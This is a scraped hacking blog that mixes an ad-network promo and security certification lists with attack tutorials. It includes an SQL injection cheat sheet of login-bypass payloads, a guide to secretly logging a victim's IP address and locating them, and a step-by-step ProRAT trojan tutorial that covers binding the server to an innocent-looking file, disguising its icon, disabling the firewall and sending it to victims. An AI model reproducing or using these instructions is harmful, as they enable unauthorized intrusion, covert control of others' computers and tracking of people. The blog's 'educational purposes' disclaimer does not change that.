Latest News

Earn Money Online


I’ve been signed up for Bidvertiser since I started working online but didn’t put much importance in this pay per click website. They paid me recently and this is why I am so excited with this platform. Bidvertiser is just like Google Adsense and here you can get some ads to put on your website or Blog or WordPress etc. You will be getting paid when someone clicks on the ad. This is a cool for you can earn money online. It’s easy to sign up for Bidvertiser. They provides free publisher account. Once you’re approved, you can start putting ads on your page and earn money. To get started, click on, “Add a new bidvertiser” tab and add your website URL. Now one website can’t be registered in two accounts. You have to choose a category of your website and this will show up adds relevant to that category. Once you’re done, you can click on the “template” to choose the ad format, color and style. Click on “Get code” to get your ad code. Here are the reasons why it’s a better alternative to adsense.

1. They show higher paying ads: This is why the name is “Bidvertiser.” Your ad unit will show up the maximum paid ads each. This means you will have the chance to earn more money per click.

2. Add as much units you wish: If you’ve ever used adsense, then you will know that you can’t put 3 add units per page. But in bidvertiser, you can put as many ad units you want meaning more revenue. It’s a better choice for longer pages.

3. Minimum payout $50: Adsense pays a minimum of $100 per month but bidvertiser will pay you even if you made half of that. Their minimum paying check amount is $50. Now you can wish to choose bidvertiser.

4. PayPal Payments: PayPal users, it’s a good info that bidvertiser pays you with PayPal, same day payment. The minimum payout for paypal is only $10, isn’t that wonderful?

5. Custom ad units: You can also create a custom ad unit for your website. This is a feature, adsense dosn’t have. You can choose the size(Width, Height) and even fonts.

6. Current bids: These are some info that adsense will never shared with anyone. You can see the current bid of your ad unit. See the list of ads and bid amount and you will learn how much you can earn with a particular ad.

7. $20 Ad bonus: This is a promotional offer from bidvertiser. If you sign up for an advertiser in bidvertiser, you will get $20 ad credit for free. You don’t have to spend anything else until you have your free credit. This is sure a great way to promote your site.

8. Refferal bonus: Bidvertiser offers different advertiser and publisher commissions. All you have to do is to add some of the affiliate links and banners in your website. Once a person joins and spends or earns an amount of money, you will be paid a commission.

So What are you waiting ? Register Now and earn Money Online !
Click on Banner for sign up
Register as Publisher 

Payment Proof 

Don't Know How to Make Website or Blog ?
Kindly Mail Us We will design your website or blog : mrquiety@geekyshows.com

Like it ? Share it.

EC-Council Security Certifications


The International Council of Electronic Commerce Consultants (EC-Council) is a member-supported professional organization. The EC-Council is headquartered in Albuquerque, New Mexico.
The EC-Council is known primarily as a professional certification body. Its best-known certification is the Certified Ethical Hacker. It also operates a series of IT security conferences and cosponsored SC Magazine's 2007 salary survey, as well as the EC-Council University.
The EC-Council is best known for its professional certifications for the IT security field. It offers numerous certifications in a variety of fields related to IT security, including disaster recovery, secure programming, e-Business and general IT security knowledge.

IT Security Professional Certifications -
  • Certified Ethical Hacker (CEH)
  • Certified EC-Council Instructor (CEI)
  • Computer Hacking Forensic Investigator (CHFI)
  • EC-Council Certified Chief Information Security Officer (CISO)
  • EC-Council Certified Security Analyst (ECSA)
  • EC-Council Certified Incident Handler (ECIH)
  • Certified Network Defense Architect (CNDA)
  • Licensed Penetration Tester (LPT)
  • EC-Council Certified VOIP Professional (ECVP)
  • EC-Council Network Security Administrator (ENSA)
  • EC-Council Certified Computer Investigator (ECCI)
  • EC-Council Certified Encryption Specialist (ECES)
  • EC-Council Certified Chief Information Security Officer C|CISO
Entry Level Security Certifications:
  • Security 5 (Security|5)
  • Network 5 (Network|5)
  • Wireless 5 (Wireless|5)
Graduate Level Certifications:
  • Fundamentals in Computer Forensics
  • Fundamentals in Information Security
  • Fundamentals in Network Security
  • EC-Council Certified Security Specialist (ECSS)
Official Website : Click Here

Like it ? Share it.

Dark comet RAT TuT [PDf with Picture ] NooB friendly

Manually Web Application Penetration Testing: Fuzzing - Part 4

Introduction
When we test a web application, we do not test a single page, but a lot of pages of a single web application. Each page may have more than one variable, so technically you will be engaging with a ton of variables during your web application test. So when you inject anything into the input, it is good to know what kind of effect your injection has on the server. In this part of this series of articles, we will look at the importance of simple alphabetic injection along with the web page encoding technology and how it affects our testing and result.

Simple Alphabetic Injection
When you engage with many web pages and a ton of variables, it is good to find your input after you inject. When you give something to the web page as an input, your input will not be used in only one place, but it will be used for many variables and tons of places. One of the common ways to check which areas use a given input is to give a simple alphabetic injection. This simple alphabetic injection can be anything. As I said in an earlier article, I personally use Jonnybravo as a username and momma as a password. If I use any special characters within my input, it might get encoded/eliminated to prevent the injection attacks on that page. What encoding is and how it takes place I will cover later on. The reason for using simple alphabetic injection is because it will never be encoded or eliminated by the server and you can easily find your input within the response as well as the request.


Hidden secrets Of windows explorer



Hackers AddOn [FireFox]

Fire Fox - A hackers Browser 


In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. If you are using BACKTRACK than use OWASP Mantra which has lots of useful Add-ons.

(1)Firebug
Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.Add Firebug in your Browser from this link:https://addons.mozilla.org/en-US/firefox/addon/firebug/

(2)Web Developer
Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.Add Web Developer in your browser from this link: https://addons.mozilla.org/de/firefox/addon/web-developer/

(3)Live HTTP Headers
Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.Add 
Live HTTP Headers to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

(4)Tamper Data
Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.Add the 
Tamper data add-on to Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)


(5)Hackbar
Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.Add 
Hackbar add-on to Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/ 


(6)Websecurify
Websecurify is a nice penetration testing tool that is also available as add-on for Firefox. We have already covered WebSecurify in detail in previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerability. Unlike other listed tools, it is a complete penetration testing tool in itself available as a browser add-on. It gives most of the features available in standalone tool.AddWebSecurify to Firefox browser with this link: https://addons.mozilla.org/en-us/firefox/addon/websecurify/

(7)XSS Me
Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.Add XSS Me
to your Firefox browser: https://addons.mozilla.org/en-us/firefox/addon/xss-me/

(8)SQL Inject Me
SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.Add SQL Inject Me
add-on to your browser: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

(9)CryptoFoxCryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.Add CryptoFox add-on to your browser:https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

cheat sheet for admin page bypass [sql injection]

strings ::

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
= 'or' 1=1
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

How to hack an IP addess of a remote computer


What can you do with an IP address?
Well you can hack a computer using it's IP address.
You can find the location of the computer using its IP address.

Things required:
1)  PHP script to catch the IP.
2) .txt file to store the IP.
you can download them from here.

Procedure:
Step 1: First create an account in any free webhosting site.
          examples are www.110mb.com
                              www.drivehq.com
                              www.t35.com
                              www.my3gb.com
Step 2: Extract the IP finder script you have downloaded.
Step 3: Now Upload the files onto the free web hosting site.
Step 4:Give the link of ip.php script to your friend.

When he clicks the link, his IP address will be strored in the ip_log.txt file.

DEMONSTRATION:

Here i have uploaded my scripts on to www.my3gb.com


and i clicked the ip.php link.
Now my IP address is stored in the ip_log.txt file

You can check out this with www.showmyip.com
Finding the location of the computer:
Now pick the IP address you got from the victim and open www.ip2location.com
here enter the IP address in the box and click "find location".
Thats it..

HOW TO USE GOOGLE AS A PROXY

Using Google as a proxy is a neat little trick you can use to bypass work or school filters with ease.

Prerequisites

  • none, this shit is easy.



Guide
 




  • translate your language from anything to your language (in my case, English)
  • insert the URL you'd like to visit in the translate box
  •   

    • click the "translated" URL on the right
    • you're now using Google as a proxy.
    • to test this, you could translate 

    • WHATISMYIP to see if you see Google's IP
    • and, we do:

    GIAC Security Certifications


    Global Information Assurance Certification (GIAC) is an information security certification entity that specialises in technical and practical certification as well as new research in the form of its GIAC Gold program. SANS Institute founded the certification entity in 1999 and the term GIAC is trademarked by The Escal Institute of Advanced Technologies.
    GIAC provides a set of vendor-neutral computer security certifications linked to the training courses provided by the SANS. GIAC is specific to the leading edge technological advancement of IT security in order to keep ahead of "black hat" techniques. Papers written by individuals pursuing GIAC certifications are presented at the SANS Reading Room on GIAC's website.
    Initially all SANS GIAC certifications required a written paper or "practical" on a specific area of the certification in order to achieve the certification. In April 2005, the SANS organization changed the format of the certification by breaking it into two separate levels. The "silver" level certification requires two multiple-choice tests, whereas the "gold" level certification has both the multiple-choice tests requirement as well as a practical.
    As of June 18, 2012, GIAC claims to have granted 42,663 certifications worldwide.

    SANS GIAC Certifications-
    Security Administration
    • GIAC Information Security Fundamentals [GISF]
    • GIAC Security Essentials Certification [GSEC]
    • GIAC Certified Firewall Analyst [GCFW]
    • GIAC Certified Intrusion Analyst [GCIA]
    • GIAC Certified Incident Handler [GCIH]
    • GIAC Certified UNIX Security Administrator [GCUX]
    • GIAC Certified Windows Security Administrator [GCWN]
    • GIAC Certified Enterprise Defender [GCED]
    • GIAC Penetration Tester [GPEN]
    • GIAC Certified Web Application Penetration Tester [GWAPT]
    • GIAC Assessing Wireless Networks [GAWN]
    • GIAC Secure Internet Presence [GSIP]
    Audit
    • GIAC Securing Oracle Certification [GSOC]
    • GIAC Certified ISO-17799 Specialist [G7799]
    • GIAC Systems and Network Auditor [GSNA]
    • GIAC Security Audit Essentials [GSAE]
    Management
    • GIAC Information Security Professional [GISP]
    • GIAC Security Leadership Certification [GSLC]
    • GIAC Certified Project Manager [GCPM]
    • GIAC Certified Security Consultant [GCSC]
    Operations
    • GIAC Operations Essentials Certification [GOEC]
    Software Security and/or Secure Coding
    • GIAC .Net [GNET]    
    • GIAC Secure Software Programmer C [GSSP C]    
    • GIAC Secure Software Programmer Java [GSSP Java]
    • GIAC Secure Software Programmer .NET [GSSP .NET]
    Forensics
    • GIAC Certified Forensic Examiner [GCFE]
    • GIAC Certified Forensic Analyst [GCFA]
    • GIAC Certified Reverse Engineering Malware [GREM]
    Expert
    • GIAC Security Expert [GSE]
    • GIAC Security Expert in Malware [GSE-Malware]
    • GIAC Security Expert in Compliance [GSE-Compliance]
    Official Website : Click Here

    Like it ? Share it.

    ProRAT [Trojan ] [TuT]



    Hi guys..today i am going to show you how to set up ProRat and how to hack a computer using it. Well, i am going to finish up RAT setup articles with this. I will give the counter measures in my next article. As i haven’t written any articles on direct connection Trojans, I decided to write the one on PRORAT.

    procedure to setup ProRat

    STEP 1. First of all Download ProRat from here. Once it is downloaded extract it. A password prompt will come up. Enter the password.The password  "pro".

    STEP 2. Open up the program and You should see the following window.



    STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


    STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow. it automatically fills your IP address.
    Next put in your e-mail so that when and if a victim gets infected it will send you an email.


    STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.


    STEP  6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.


    STEP  7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate.    I prefer using .exe files.


    STEP  8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.


    STEP  9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.


    STEP  10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.



    NOTE: In this tutorial, i put the victim’s IP as 127.0.0.1 as i am testing it on my computer. Inorder to hack a remote computer, you need to get the IP address of your victim. If you dont  know how to find an IP address, you can read my article on finding out remote IP address from here

    Contact Us

    24x7 online , we happy to answer you
    tamilcypc@gmail.com

    Disclaimer

    This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



    Featured Post

    Custom Domains And HTTPS Redirection Code